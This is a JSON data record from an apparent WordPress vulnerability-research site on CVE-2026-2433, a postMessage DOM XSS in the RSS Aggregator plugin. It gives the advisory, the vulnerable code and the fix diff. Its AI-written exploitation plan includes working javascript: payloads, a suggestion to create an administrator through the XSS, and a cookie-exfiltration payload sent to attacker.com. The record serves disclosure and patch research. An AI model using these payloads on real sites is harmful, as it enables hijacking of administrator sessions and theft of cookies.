[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyWs2tOP_QYkjVk-65UJs4CVTK4nHWAXYR29eYKLN4Ls":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2433","rss-aggregator-rss-import-news-feeds-feed-to-post-and-autoblogging-unauthenticated-dom-based-reflected-cross-site-script","RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging \u003C= 5.0.11 - Unauthenticated DOM-Based Reflected Cross-Site Scripting via postMessage","The RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via postMessage in all versions up to, and including, 5.0.11. This is due to the plugin's admin-shell.js registering a global message event listener without origin validation (missing event.origin check) and directly passing user-controlled URLs to window.open() without URL scheme validation. This makes it possible for unauthenticated attackers to execute arbitrary JavaScript in the context of an authenticated administrator's session by tricking them into visiting a malicious website that sends crafted postMessage payloads to the plugin's admin page.","wp-rss-aggregator",null,"\u003C=5.0.11","5.0.12","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-06 19:00:27","2026-03-07 07:22:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F311960e7-c4b4-4638-980f-1e08ffa621ba?source=api-prod",1,[22,23,24,25,26,27,28,29],"core\u002Fadmin-frame.php","core\u002Fjs\u002Fadmin-shell.js","core\u002Fjs\u002Fdist\u002Fadmin.js","core\u002Fmodules\u002Fadmin.php","core\u002Fmodules\u002FdebugInfo.php","core\u002Fmodules\u002FfeedItems.php","core\u002Fmodules\u002Frenderer.php","core\u002Fmodules\u002FrowActions.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-2433\n\n## 1. Vulnerability Summary\nThe **RSS Aggregator** plugin (versions \u003C= 5.0.11) contains a DOM-based reflected Cross-Site Scripting (XSS) vulnerability. The vulnerability exists in the `core\u002Fjs\u002Fadmin-shell.js` file, which manages the plugin's administrative user interface. The script registers a global `message` event listener to facilitate communication between the main WordPress admin window (the \"shell\") and an internal iframe (the \"frame\"). \n\nThe listener fails to validate the `origin` of incoming `postMessage` events and subsequently passes a user-controlled URL from the message payload directly into `window.open()`. Because `window.open()` accepts `javascript:` URIs and no scheme validation is performed, an attacker can execute arbitrary JavaScript in the context of the administrator's session.\n\n## 2. Attack Vector Analysis\n- **Target Page**: `\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator`\n- **Vulnerable Script**: `core\u002Fjs\u002Fadmin-shell.js` (Enqueued as `wpra-admin-shell`)\n- **Message Event Listener**: `window.addEventListener(\"message\", ...)`\n- **Trigger Message Type**: `wpra:openUrl` (defined as `FrameMessage.openUrl`)\n- **Payload Parameter**: `payload.url`\n- **Authentication Requirement**: The victim must be an authenticated administrator capable of accessing the plugin's admin page.\n- **Precondition**: The victim must be tricked into visiting a malicious website while their WordPress admin session is active.\n\n## 3. Code Flow\n1.  **Listener Registration**: In `core\u002Fjs\u002Fadmin-shell.js`, the `WpraAdminApp` class calls `this.frame.onReceive(FrameMessage.openUrl, ...)` inside its `listenForMessages()` method.\n2.  **Generic Listener**: The `onReceive` method (in the `AppFrame` class) registers the global listener:\n    ```javascript\n    onReceive(type, handler) {\n      window.addEventListener(\"message\", (event) => {\n        const msg = event.data ?? {}\n        if (typeof msg === \"object\" && (msg.type ?? \"\") === type) {\n          handler(msg.payload)\n        }\n      })\n    }\n    ```\n    *Note: There is no `if (event.origin !== ...)` check here.*\n3.  **Handler Execution**: When a message with `type: \"wpra:openUrl\"` is received, the handler in `WpraAdminApp` executes:\n    ```javascript\n    this.frame.onReceive(FrameMessage.openUrl, (payload) => {\n      \u002F\u002F ... payload validation (checks if payload.url is string)\n      if (payload.target) {\n        window.open(payload.url, payload.target) \u002F\u002F SINK\n      } else {\n        this.frame.navigate(payload.url, \"openUrl\")\n      }\n      return\n    })\n    ```\n4.  **Sink**: `window.open(payload.url, payload.target)` is called. If `payload.url` starts with `javascript:`, the browser executes the script in the context of the current window (especially if `payload.target` is `_self` or the name of the current window).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. \nThe `message` event listener is registered globally on the `window` object immediately upon loading the `\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator` page. It does not check for any tokens or nonces within the `postMessage` data before processing the `wpra:openUrl` request.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an external site can force the WordPress admin page to execute JavaScript.\n\n### Step-by-Step Plan:\n1.  **Victim Login**: The agent will log in as an administrator.\n2.  **Malicious Page Simulation**: Since the agent cannot easily host an external site in the environment, it will simulate the \"malicious site\" by opening the vulnerable WordPress page in a new window\u002Ftab and then sending the `postMessage`.\n3.  **The Payload**:\n    ```javascript\n    {\n      type: \"wpra:openUrl\",\n      payload: {\n        url: \"javascript:window.wpra_xss_vulnerable = true; alert('XSS: ' + document.domain);\",\n        target: \"_self\"\n      }\n    }\n    ```\n\n### Execution via `http_request` \u002F `browser_eval`:\nInstead of an external site, we will use `browser_navigate` to go to the vulnerable page and then use `browser_eval` to simulate a message arriving at that window.\n\n1.  **Navigate**: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator\")`\n2.  **Trigger**:\n    ```javascript\n    window.postMessage({\n      type: \"wpra:openUrl\",\n      payload: {\n        url: \"javascript:window.wpra_xss_vulnerable = true; console.log('XSS_SUCCESS');\",\n        target: \"_self\"\n      }\n    }, \"*\");\n    ```\n\n## 6. Test Data Setup\n1.  **Plugin Activation**: Ensure `wp-rss-aggregator` is active.\n2.  **User**: An administrator user (e.g., `admin` \u002F `password`).\n3.  **No specific shortcodes or posts are required**, as the script is enqueued on the main plugin settings page.\n\n## 7. Expected Results\n- The `window.open` function will be called with the `javascript:` URI.\n- The JavaScript inside the URI will execute in the context of the WordPress admin page.\n- In the simulation, `window.wpra_xss_vulnerable` will become `true`.\n\n## 8. Verification Steps\n1.  **Check Variable**: Use `browser_eval(\"window.wpra_xss_vulnerable\")` to check if it returns `true`.\n2.  **Console Logs**: Check browser logs for the string `XSS_SUCCESS`.\n3.  **State Verification**: Use the XSS to perform an action, such as creating a new administrator, then verify via WP-CLI:\n    ```bash\n    wp user list --role=administrator\n    ```\n\n## 9. Alternative Approaches\nIf `_self` targeting is restricted by browser security policies in the test environment, use a payload that modifies the DOM or steals the cookie:\n- **Payload**: `javascript:fetch('\u002Fwp-json\u002Fwp\u002Fv2\u002Fusers\u002Fme').then(r=>r.json()).then(d=>document.body.innerHTML='HACKED: '+d.name)`\n- This demonstrates the ability to interact with the WordPress REST API using the administrator's authenticated session.\n\n### Backup Payload (Cookie Exfiltration Simulation):\n```javascript\nwindow.postMessage({\n  type: \"wpra:openUrl\",\n  payload: {\n    url: \"javascript:document.location='http:\u002F\u002Fattacker.com\u002F?cookie='+btoa(document.cookie)\",\n    target: \"_self\"\n  }\n}, \"*\");\n```","The RSS Aggregator plugin (up to version 5.0.11) is vulnerable to DOM-based reflected Cross-Site Scripting (XSS) due to a flaw in its admin-shell.js script. The script registers a message event listener that lacks origin validation and blindly processes a 'wpra:openUrl' event, passing a user-controlled URL directly into window.open() without sanitizing for the javascript: protocol.","\u002F\u002F core\u002Fjs\u002Fadmin-shell.js line 56\n    onReceive(type, handler) {\n      window.addEventListener(\"message\", (event) => {\n        const msg = event.data ?? {}\n        if (typeof msg === \"object\" && (msg.type ?? \"\") === type) {\n          handler(msg.payload)\n        }\n      })\n    }\n\n---\n\n\u002F\u002F core\u002Fjs\u002Fadmin-shell.js line 142\n      \u002F\u002F Open links in the main window\n      this.frame.onReceive(FrameMessage.openUrl, (payload) => {\n        if (typeof payload !== \"object\" || typeof payload.url !== \"string\") {\n          console.error(FrameMessage.openUrl, \"payload is missing url\")\n          return\n        }\n\n        if (payload.target) {\n          window.open(payload.url, payload.target)\n        } else {\n          this.frame.navigate(payload.url, \"openUrl\")\n        }\n        return\n      })","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.11\u002Fcore\u002Fjs\u002Fadmin-shell.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.12\u002Fcore\u002Fjs\u002Fadmin-shell.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.11\u002Fcore\u002Fjs\u002Fadmin-shell.js\t2025-09-16 08:50:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-rss-aggregator\u002F5.0.12\u002Fcore\u002Fjs\u002Fadmin-shell.js\t2026-03-03 10:20:48.000000000 +0000\n@@ -58,6 +58,10 @@\n       window.addEventListener(\"message\", (event) => {\n         const msg = event.data ?? {}\n         if (typeof msg === \"object\" && (msg.type ?? \"\") === type) {\n+          if (event.origin !== window.location.origin) {\n+            console.warn(\"WPRA: Blocked message from unauthorized origin:\", event.origin)\n+            return\n+          }\n           handler(msg.payload)\n         }\n       })\n@@ -149,6 +153,17 @@\n           return\n         }\n \n+        try {\n+          const url = new URL(payload.url, window.location.origin)\n+          if (![\"http:\", \"https:\"].includes(url.protocol)) {\n+            console.warn(FrameMessage.openUrl, \"Blocked potentially malicious URL:\", payload.url)\n+            return\n+          }\n+        } catch (e) {\n+          console.warn(FrameMessage.openUrl, \"Invalid URL:\", payload.url)\n+          return\n+        }\n+\n         if (payload.target) {\n           window.open(payload.url, payload.target)\n         } else {","To exploit this vulnerability, an attacker tricks an authenticated administrator into visiting a malicious website. This malicious site opens a new window or iframe pointing to the plugin's admin page at \u002Fwp-admin\u002Fadmin.php?page=wprss-aggregator. Once the WordPress page is loaded, the malicious site sends a postMessage with the type 'wpra:openUrl'. The payload contains a 'url' property set to a 'javascript:' URI (e.g., javascript:alert(document.cookie)) and a 'target' property set to '_self'. Since admin-shell.js does not check if the message came from a trusted origin or if the URL protocol is safe, it calls window.open() with the attacker-supplied script, executing it in the context of the administrator's session.","gemini-3-flash-preview","2026-04-18 05:26:47","2026-04-18 05:27:14",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.0.11","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags\u002F5.0.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-rss-aggregator.5.0.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-rss-aggregator\u002Ftags"]